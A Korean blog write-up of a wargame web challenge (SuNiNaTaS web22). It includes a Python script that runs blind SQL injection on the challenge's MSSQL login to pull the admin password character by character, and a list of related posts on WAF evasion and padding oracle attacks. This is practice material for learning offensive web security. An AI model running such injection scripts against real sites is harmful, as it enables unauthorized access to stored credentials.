처음엔 pw 부분에 했는데 계속 No Hack이 떠서 뭐지? 했다.
그러다 id에 하니까 잘 된다.
그리고 요즘 워게임에서 mysql만 쓰다보니 당연히 mysql 문법으로 진행하는데 뭔가 이상해서 테스트해보니 mssql이였다.
그래서 mssql 문법으로 진행하니 잘 되었다.
mssql의 문자열함수는 아래 블로그를 통해 확인하였다.
http://egloos.zum.com/clearm81/v/198485
아래의 방법으로 길이가 총 10자리인 것을 확인하였다.
아래와 같이 코드를 짰는데 인터넷이 이상해서 계속 끊켜서 못해먹겠다..ㅠㅠ
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | import urllib import urllib2 result ='' for i in range(1,11): for j in range(32,128): print "Testing " + str(i) + " : " + str(j) url="http://suninatas.com/Part_one/web22/web22.asp?id=admin'+and+unicode(substring(pw,"+str(i)+",1))="+str(j)+"--+&pw=guest" request = urllib2.Request(url) request.add_header('Cookie','ASPSESSIONIDASASDRCS=IOKBKGGBNLMKJAGAGCCJHOGL') response = urllib2.urlopen(request) if response.read().find("False") != -1: print "[+] "+ str(i) + " : " + chr(j) result += chr(j) break | cs |
수동으로 하여 답을 찾았다.
수동으로는 이런식으로 범위로 하여 찾았다~
와..인터넷을 고쳐야지...ㅠㅠ
'Hacking > Web' 카테고리의 다른 글
Web Application Firewall (WAF) Evasion Techniques #2 (0) | 2018.06.03 |
---|---|
Web Application Firewall (WAF) Evasion Techniques (0) | 2018.06.03 |
sql injection using md5 (0) | 2018.05.09 |
Blind SQL Injection tool 분석 (4) | 2018.05.06 |
Padding Oracle Attack (0) | 2018.05.01 |